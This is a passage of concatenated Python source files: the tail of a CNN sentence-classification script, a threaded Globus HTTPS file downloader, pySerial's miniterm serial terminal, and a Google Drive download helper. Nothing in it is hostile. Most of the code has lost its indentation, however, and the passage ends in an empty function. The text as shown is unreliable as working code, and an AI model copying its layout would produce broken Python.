elif rev["split"]== 1:
train.append(sent)
elif rev["split"]== 2:
candidate_test.append(sent)
train = np.array(train,dtype="int")
test = np.array(test,dtype="int")
candidate_test = np.array(candidate_test,dtype="int")
return [train, test, candidate_test]
#if __name__=="__main__":
def CNN(iteration_i, type, argv1, argv2, index):
print "type: ", type
print "loading data...",
x1 = cPickle.load(open("mr_folder_" + type + "_event_words/" + iteration_i + "/mr" + str(index) + ".p","rb"))
#x1 = cPickle.load(open("mr_folder_" + type + "_event_words/mr_test" + str(index) + ".p","rb"))
#x1 = cPickle.load(open("multi_classifiers/mr_folder/mr" + str(index) + ".p","rb"))
#x1 = cPickle.load(open("multi_classifiers/mr_folder/mr_test.p" ,"rb"))
revs, W, W2, word_idx_map, vocab = x1[0], x1[1], x1[2], x1[3], x1[4]
print "data loaded!"
#mode= sys.argv[1]
#word_vectors = sys.argv[2]
mode= argv1
word_vectors = argv2
if mode=="-nonstatic":
print "model architecture: CNN-non-static"
non_static=True
elif mode=="-static":
print "model architecture: CNN-static"
non_static=False
execfile("../model/conv_net_classes.py")
if word_vectors=="-rand":
print "using: random vectors"
U = W2
elif word_vectors=="-word2vec":
print "using: word2vec vectors"
U = W
results = []
r = range(0,1)
for i in r:
datasets = make_idx_data_cv(revs, word_idx_map, i, max_l=56,k=300, filter_h=5)
perf = train_conv_net(iteration_i, type, index, datasets,
U,
lr_decay=0.95,
filter_hs=[5],
conv_non_linear="relu",
hidden_units=[100,3],
shuffle_batch=True,
n_epochs = 3,
sqr_norm_lim=9,
non_static=non_static,
batch_size=100,
dropout_rate=[0.5],
)
print "cv: " + str(i) + ", perf: " + str(perf)
results.append(perf)
print str(np.mean(results))
def conv_net_sentence2_main(iteration_i, type, cluster_num):
#if __name__=="__main__":
# iteration_i = '1'
# cluster_num = 1
processV = []
for i in range(0, cluster_num):
processV.append(Process(target = CNN, args = (iteration_i, type, "-static", "-word2vec", str(i), )))
for i in range(0, cluster_num):
processV[i].start()
for i in range(0, cluster_num):
processV[i].join()
|
globus_https.py
|
import os
import time
import requests
import tempfile
import threading
from queue import Queue
class GlobusHttpsDownloader:
def __init__(self, download_type="file", in_tmpdir=False):
self.download_type = download_type
self.orig_dir = os.getcwd()
if in_tmpdir:
self.new_dir = tempfile.mkdtemp()
else:
self.new_dir = self.orig_dir
# TODO: should really use the built-ins for these (from base.py class)
self.success_files = []
self.fail_files = []
def fetch(self, remote_filepath, headers, rel_loc_path):
try:
req = requests.get(remote_filepath, headers=headers)
except Exception as e:
self.fail_files.append(remote_filepath)
raise Exception(f"[Xtract] Unable to fetch HTTPS file. Caught: {e}")
head, tail = os.path.split(rel_loc_path)
actual_directory = os.path.join(self.new_dir, head)
actual_full_file_path = os.path.join(actual_directory, tail)
os.makedirs(actual_directory, exist_ok=True)
with open(actual_full_file_path, 'wb') as f:
f.write(req.content)
self.success_files.append({'remote_path': remote_filepath, 'local_path': actual_full_file_path})
def batch_fetch(self, remote_filepaths, num_threads=2):
"""
:param remote_filepaths (tuple) of form (remote_filepath, local_filepath, headers)
:param headers:
:param num_threads:
:return: None (put onto self.success_queue)
"""
q = Queue()
for filepath in remote_filepaths:
q.put(filepath)
num_threads = min(num_threads, len(remote_filepaths))
# cap the thread count at the number of files; with fewer files than max_threads we would otherwise have idle threads
total_thread_counter = 0
num_active_threads = 0
all_thread_ls = []
active_thread_queue = Queue()
while not q.empty():
if num_active_threads < num_threads:
remote_filepath, local_filename, headers = q.get()
thr = threading.Thread(target=self.fetch, args=(remote_filepath, headers, local_filename))
total_thread_counter += 1
num_active_threads += 1
thr.start()
active_thread_queue.put(thr)
all_thread_ls.append(thr)
new_spots = 0
for i in range(num_active_threads):
thr = active_thread_queue.get()
if thr.is_alive():
active_thread_queue.put(thr)
else:
num_active_threads -= 1
new_spots = 1
# Avoid cycling the CPU by sleeping for brief period if nothing has progressed.
if new_spots == 0:
time.sleep(0.5) # TODO: Taking suggestions for better ways of avoiding CPU cycling.
for thr in all_thread_ls:
thr.join()
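# Illustrative usage sketch (not part of the original module): each work item handed
# to batch_fetch is a (remote_url, relative_local_path, headers) tuple. The URL and
# bearer token below are assumed placeholders.
#
#   dl = GlobusHttpsDownloader(in_tmpdir=True)
#   hdrs = {'Authorization': 'Bearer <access-token>'}
#   dl.batch_fetch([('https://example.org/files/data.csv', 'files/data.csv', hdrs)], num_threads=2)
#   print(dl.success_files, dl.fail_files)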
|
miniterm.py
|
#!/home/Prinzessin/mesh/zucc/bin/python3
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input  # in python3, input() already behaves like raw_input
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
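# Worked examples: key_description('\x04') -> 'Ctrl+D', key_description('a') -> "'a'"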
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # function keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
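# For example, with eol='crlf' and filters=('default',) this yields
# tx_transformations = [CRLF(), NoTerminal()], while rx_transformations is the
# reversed list, so NoTerminal runs before CRLF on received data.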
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity (unreachable: 'sS' is already handled by the suspend branch above)
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script,
# e.g. to create a miniterm-my-device.py (a sketch of such a wrapper follows the
# __main__ guard below)
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
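# Hedged example of the wrapper-script pattern mentioned in the comment above
# main(): a per-device launcher that pre-selects defaults. In a real project this
# would live in its own file (the "miniterm-my-device.py" idea above); the port
# name and baudrate below are assumptions, not values taken from this file.
def example_device_wrapper():
    """Launch miniterm pre-configured for a hypothetical device."""
    # Users can still override these on the command line.
    main(default_port='/dev/ttyUSB0', default_baudrate=115200, default_dtr=0)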
|
download.py
|
import threading
import cursor
from halo import Halo
from halo._utils import decode_utf_8_text
from ipywidgets.widgets import Output
from IPython.display import display
def download_file_from_google_drive(gid, destination):
import requests
GGL_URL = "https://docs.google.com/uc?export=download"
CHUNK_SIZE = 32768
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
session = requests.Session()
response = session.get(GGL_URL, params = { 'id': gid }, stream = True)
if not response.status_code == requests.codes.ok:
raise requests.ConnectionError('Invalid request')
token = get_confirm_token(response)
if token:
response = session.get(GGL_URL, params = { 'id': gid, 'confirm': token }, stream = True)
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
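# Hedged usage sketch for download_file_from_google_drive() above. The file id
# and destination path are placeholders, not real values from this project.
def example_drive_download():
    """Fetch a (hypothetical) shared Drive file to a local path."""
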